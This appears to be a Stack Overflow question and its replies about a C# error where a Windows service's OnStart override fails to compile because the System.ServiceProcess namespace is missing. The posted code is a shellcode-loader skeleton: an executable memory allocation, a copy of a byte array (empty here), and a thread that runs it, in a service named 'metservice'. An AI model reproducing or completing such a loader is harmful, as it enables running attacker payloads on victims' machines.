# 'Service1.OnStart(string[])': no suitable method found to override bypass

Tags: c#, .net

I am trying to execute the below code but unable to compile due to the error **OnStart** function.

When I try to compile this whole code it shows up error in Service class function along with On start function .
Currently I am trying to compile this code on visual studio 2015 .

I have tried changing OnStart() to OnAppearing() but no change same error comes up  every time .

Please visit the link to see the screenshot

https://i.stack.imgur.com/5S0tH.png

```
using System;
using System.Runtime.InteropServices;

    namespace metservice
    {
        public partial class Service1 : ServiceBase
        {

    protected override void OnStart(string[] args)
            {
                byte[] code1 = new byte[] { };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)code1.Length,
                            MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(code1, 0, (IntPtr)(funcAddr), code1.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;

            // execute native code

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

        }

        private static UInt32 MEM_COMMIT = 0x1000;

        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;


        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress,
                              UInt32 dwSize, UInt32 dwFreeType);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(

          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId

          );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(

          IntPtr hHandle,
          UInt32 dwMilliseconds
          );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(

          string moduleName

          );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(

          IntPtr hModule,
          string procName

          );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(

          string lpFileName

          );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();

    }
}
```

Comment: yes now you can check

Comment: Works for me https://dotnetfiddle.net/z0PvGQ

Comment: I am trying to run on visual studio 2015 but still popin up with the same error

Comment: is that the only error you get? is there more?

Comment: now you can try compile the whole code

Comment: I'm guessing there is another `ServiceBase` in your project.

Comment: nope there is none

Comment: What happens when you right click on `ServiceBase` and choose "Go to definition." Do you see the missing virtual method?

Comment: When I try to run the project on https://dotnetfiddle.net/ its shows service base error but when I try to run the project on visual studio it shows error on OnStart().

Comment: [ServiceBase](https://learn.microsoft.com/en-us/dotnet/api/system.serviceprocess.servicebase?view=dotnet-plat-ext-5.0) is defined in `System.ServiceProcess` namespace, for which it seems you don't have a `using` in your list of used namespace; so it seems your code is actually referring to something else, not the `System.ServiceProcess.ServiceBase` class you think

Comment: you are right but when I compile the code in the visual studio , the visual studio raises an exception and when I autofix it , it removes it

Comment: what if you use name with full namespace when inherit? `public partial class Service1 : System.ServiceProcess.ServiceBase`

Comment: yes tried but same error

Answer (score 1):

You could try adding the namespace to the class you are inheriting:

```
public partial class Service1 : System.ServiceProcess.ServiceBase 
{ 
  ...
}
```

Or simply add the namespace:

```
using System.ServiceProcess;
```

If for some reason this does not work: make sure you referenced the assembly: *System.ServiceProcess.ServiceController.dll*

Since the class is defined **partial** and we do not get the other part(s), it could also be that there is also an error in this other part.

To test this, try removing the partial keyword and see if your code compiles then. System.ServiceProcess.ServiceBase has a virtual protected OnStarted method, so it should be overridable the way you set it up.

Comment: I have tried both already but not working . Still same error

Comment: Can you provide us more insight in the errors you are getting? Just a simple screenshot perhaps?

Comment: I tried using public class Service1 : ServiceProcess.ServiceBase

Comment: Add it in the original question. It's not possible in comments, except trough a link

Comment: please go through the link to check out the screenshot https://i.stack.imgur.com/5S0tH.png

Comment: is it possible to replace override function with some other function?

Comment: I don't see myself what is wrong here. At the moment I have no pc available, so I have to check at a later time.

Comment: @ahmerserwer In the screenshot I see that you did this:

Service1 : ServiceProcess.ServiceBase

This does not work at my side, and it gives me the same error, with the additional error that the Type or Namespace ServiceProcess could not be found.
If I write the namespace in full (so including System):

public partial class Service1 : System.ServiceProcess.ServiceBase

Then all errors disappear and I can compile it. (Visual Studio 2015, .NET framework 4.5)

See: https://prnt.sc/weavdh

Comment: But please also note that you can just add "using System.ServiceProcess" and just inherit like so: "public partial class Service1 : ServiceBase"

Comment: Yes I tried the same but still I have the same error on the OnStart function.  https://prnt.sc/weigtp

Comment: Even I added "using System.ServiceProcess" it gave me errors on it too. https://prnt.sc/weimw4

Comment: But when I use "using static System.ServiceProcess" the error on "public partial class Service1 : ServiceBase" goes away but still the error persists .https://prnt.sc/weitug